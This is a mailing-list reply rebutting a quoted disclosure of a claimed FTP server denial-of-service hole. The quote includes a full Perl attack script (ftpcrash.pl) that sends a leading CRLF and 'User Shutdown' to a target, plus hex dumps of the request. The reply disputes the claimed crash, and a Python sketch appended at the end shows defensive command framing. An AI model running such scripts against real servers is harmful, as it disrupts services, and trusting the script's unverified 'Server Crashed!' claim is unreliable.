Message-ID: <hjtlb7.pc2c1t@d101.x-mailer.de>
From: a.gietl at e-admin.de (Andreas Gietl)
Subject: FTPServer Denial Of Service Vulnerability
"Florian Rock" <florianrock@....de> wrote:
it does not crash proftpd....
and your code is really bad. it just waits a second and then says the server
has crashed without any checks - it just sees whether it can send your
"exploit" code .....
> I have found a very serious hole in FTPServer
> The exploit is tested on Cerberus FTP Server 1.71 and an own-coded one, but I think
> all FTP servers are vulnerable.
> Sorry, but I have too few FTP servers to test.
>
> And so it Works
> Typical request:
> 00000000 55 73 65 72 20 53 68 75 74 64 6f 77 6e 0d 0a User Shutdown..
>
> Exploit request:
> 00000000 0d 0a 55 73 65 72 20 53 68 75 74 64 6f 77 6e ..User Shutdown
>
> I've coded an exploit:
> See attached file: ftpcrash.exe (zipped) for people who have no perl
>
> My exploit (in perl):
> [code]
> -ftpcrash.pl-
> print "Exploit for FTP-Server\n";
> print " by The real Remoter\n";
> my $usage = "\nftpcrash <IP> <Port>\n";
> die "$usage" unless $ARGV[0] && $ARGV[1];
> use Socket;
> my $remote = $ARGV[0];
> my $port = $ARGV[1];
> my $iaddr = inet_aton($remote);
> my $proto = getprotobyname("tcp");
> my $paddr = sockaddr_in($port, $iaddr);
> socket(SOCK, PF_INET, SOCK_STREAM, $proto);
> connect(SOCK, $paddr) or die "Can't connect to " . $remote;
> print "Sending exploit\n";
> $msg = "\x0d\x0a";
> $msg = $msg . "User Shutdown";
> send(SOCK,$msg, 0) or die "Can't send Exploit";
> sleep(1);
> print "Server Crashed!";
> sleep(1);
> exit;
> [/code]
>
> Sorry for my bad English (I'm German)
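
Added example, not part of the original thread and not code from any server named in it: a server-side sketch of control-channel framing that handles both byte sequences from the hex dumps above without failing. The post does not say why the server stops, so the class name, the 512-byte line cap and the choice to treat a bare CRLF as a no-op are assumptions made for illustration.

```python
# Added example: defensive framing of FTP control-channel input.
# The two byte strings below are the requests shown in the post's hex dumps.
TYPICAL_REQUEST = b"User Shutdown\r\n"
REQUEST_FROM_POST = b"\r\nUser Shutdown"   # leading CRLF, no terminator

MAX_LINE = 512  # assumed cap on one command line (not from the post)


class ControlChannelFramer:
    """Splits raw control-channel bytes into parsed command events."""

    def __init__(self):
        self.buf = b""  # bytes received but not yet terminated by LF

    def feed(self, data):
        """Return a list of (kind, verb, arg) events for newly received bytes."""
        self.buf += data
        events = []
        while True:
            idx = self.buf.find(b"\n")
            if idx < 0:
                break
            line, self.buf = self.buf[:idx], self.buf[idx + 1:]
            events.append(self._parse(line.rstrip(b"\r")))
        # An unterminated command stays buffered, but never without bound.
        if len(self.buf) > MAX_LINE:
            self.buf = b""
            events.append(("error", "500", "line too long"))
        return events

    @staticmethod
    def _parse(line):
        if len(line) > MAX_LINE:
            return ("error", "500", "line too long")
        text = line.decode("latin-1").strip()
        if not text:
            # Bare CRLF: no verb to dispatch, so nothing is indexed or executed.
            return ("empty", "", "")
        verb, _, arg = text.partition(" ")
        if not verb.isalpha():
            return ("error", "500", "syntax error")
        return ("command", verb.upper(), arg.strip())
```

A server loop would answer `error` events with the given reply code, ignore `empty` events, and close the connection on a read timeout if `buf` still holds an unterminated command.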